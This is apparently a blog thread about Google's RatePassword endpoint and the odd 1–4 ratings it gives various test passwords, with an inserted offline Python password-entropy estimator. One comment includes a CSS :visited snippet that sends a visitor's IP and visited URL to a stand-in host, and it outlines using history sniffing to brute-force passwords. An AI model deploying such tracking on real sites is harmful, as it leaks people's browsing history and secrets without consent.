You can get a "password strength" rating from Google by using https://www.google.com/accounts/RatePassword?Passwd=[password]. This is used by the "change password" page on Google Accounts to show a bar indicating password strength.
This rating not only considers password length, capitalization, and the use of numbers as well as letters, but also the use of various dictionary words.
For example, https://www.google.com/accounts/RatePassword?Passwd=password , https://www.google.com/accounts/RatePassword?Passwd=gmail , and https://www.google.com/accounts/RatePassword?Passwd=google all give the lowest possible rating of "1", because "password", "gmail", and "google" would be insecure passwords for a Google account. https://www.google.com/accounts/RatePassword?Passwd=blogger and https://www.google.com/accounts/RatePassword?Passwd=googlemail both give a rating of "2".
Interestingly, https://www.google.com/accounts/RatePassword?Passwd=gdrive gives a rating of "3", even though similar passwords of similar length and complexity such as https://www.google.com/accounts/RatePassword?Passwd=gsearch or https://www.google.com/accounts/RatePassword?Passwd=gstore give the highest rating of "4". I also observed that https://www.google.com/accounts/RatePassword?Passwd=glinux has a rating of "3" even though https://www.google.com/accounts/RatePassword?Passwd=gunix and https://www.google.com/accounts/RatePassword?Passwd=gbsd have a rating of "4".
Maybe they just use their index? "Gdrive" is in 882000 pages, "GLinux" in 22000, my passwords in 0 pages.
Is it safe to Google your passwords? Hmm, I guess so. They appear in your search history – but to see it you need the password anyway.
If it's being googled server to server then there's no problem and it doesn't mean it should appear in your search history.
Sam:
Google logins use SSL encryption but Google web search does not use encryption, so it is not safe to Google your passwords.
Moreover, if it's a specific password, it might get spotted. Not very interesting though. But Googlers say they see really weird things on the live query screens at Google.
Also, it is possible to use clever CSS to reveal whether a visitor to your website has visited a specific URL (for example: #foobar:visited { background: url('http://example.com/user_has_visited?ip=123.45.67.89&addr=http://foobar.com'); }). Although the simple CSS example I provided requires a server callback, with more elaborate code this is not necessary and all processing can be done in JavaScript (for IE/Opera, use a javascript: URL as the background; for Mozilla, attach an XBL binding to the :visited and detect based upon a constructor call). Basically, this could be used to easily run a dictionary or even brute force attack on your password by tricking you into visiting a page.
I think the 1 to 4 rating is a little bit of cr*p because my most insecure password I use, only letters, is four.
Hmm.... A lv 4 password is pretty secure eh?
I think I'm going to run out and change my pass to something more secure like dogcatrat https://www.google.com/accounts/RatePassword?Passwd=dogcatrat cause it is just as secure as my old password: dogcatrat553495248985699!4059 according to G: https://www.google.com/accounts/RatePassword?Passwd=dogcatrat553495248985699!4059
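The thread's complaint about the capped 1–4 scale (and the worry about sending candidate passwords to a remote endpoint at all) is easier to reason about with a local estimator that reports an entropy estimate in bits alongside a coarse rating. The following is an added example of my own, not Google's RatePassword algorithm and not code from this thread: the tiny wordlist, the charset sizes and the bit cut-offs for ratings 1–4 are all assumed constants chosen for illustration. It treats each recognised dictionary word as worth only log2(wordlist size) bits, so a concatenation like dogcatrat scores as three words rather than nine random letters, while the digit/symbol tail of the longer password is credited per character.

```python
import math
import string

# Constructed toy wordlist for illustration; a real checker would load a
# large dictionary or breached-password list instead.
WORDLIST = frozenset([
    "password", "google", "gmail", "blogger", "googlemail",
    "dog", "cat", "rat", "drive", "linux",
])

# Assumed entropy cut-offs (in bits) between ratings 1/2, 2/3 and 3/4.
THRESHOLDS = (28, 36, 60)


def charset_size(pw: str) -> int:
    """Size of the alphabet the password appears to be drawn from."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(c in string.punctuation or c.isspace() for c in pw):
        size += 33  # printable ASCII symbols plus space
    return max(size, 1)


def segment(pw: str):
    """Split pw into (dictionary words found, leftover characters).

    Longer words are matched first so "googlemail" is not double-counted
    as "google" plus leftovers. Matched spans are blanked with NUL so a
    later word cannot span across an earlier match.
    """
    words = []
    rest = pw.lower()
    for w in sorted(WORDLIST, key=len, reverse=True):
        while w in rest:
            words.append(w)
            rest = rest.replace(w, "\x00", 1)
    leftover = rest.replace("\x00", "")
    return words, leftover


def estimate_bits(pw: str) -> float:
    """Crude entropy estimate: each dictionary word is one choice out of
    len(WORDLIST); every other character is one choice out of the charset."""
    words, leftover = segment(pw)
    word_bits = len(words) * math.log2(len(WORDLIST))
    char_bits = len(leftover) * math.log2(charset_size(pw))
    return word_bits + char_bits


def rate(pw: str) -> int:
    """Map the bit estimate onto a 1-4 rating using THRESHOLDS."""
    bits = estimate_bits(pw)
    return 1 + sum(bits >= t for t in THRESHOLDS)


if __name__ == "__main__":
    # Candidates taken from the thread; the check runs entirely offline.
    for candidate in ("password", "dogcatrat",
                      "dogcatrat553495248985699!4059", "1 3", "gsearch"):
        print(f"{candidate!r:36} {estimate_bits(candidate):6.1f} bits "
              f"-> rating {rate(candidate)}")
```

Because the function returns the bit estimate as well as the rating, two passwords that land in the same bucket can still be told apart, which is exactly what a capped scale hides; and because everything runs locally, no candidate password ever leaves the machine.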
> Basically, this could be used to easily run a dictionary or even brute force attack on your password by tricking you into visiting a page.

I think it's easier to run a dictionary attack on your password itself ;) You would notice if a page attempted to load a page with links to every possible word ;) And Google's search URLs differ depending on many factors. For example my search URL goes like this – http://www.google.pl/search?hl=en&lr=&safe=off&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aofficial&hs=to3&q=my%20password&btnG=Search
For the 1 trillion word corpus they recently released, they considered any string that occurred more than 200 times a word, IIRC.
Ludwik:
It's not hard to determine what someone's Google search URL format is – for example, an HTTP referrer header could be used to determine it.
"1 3" (without quotes) is a pretty secure password. :) Lv. 4.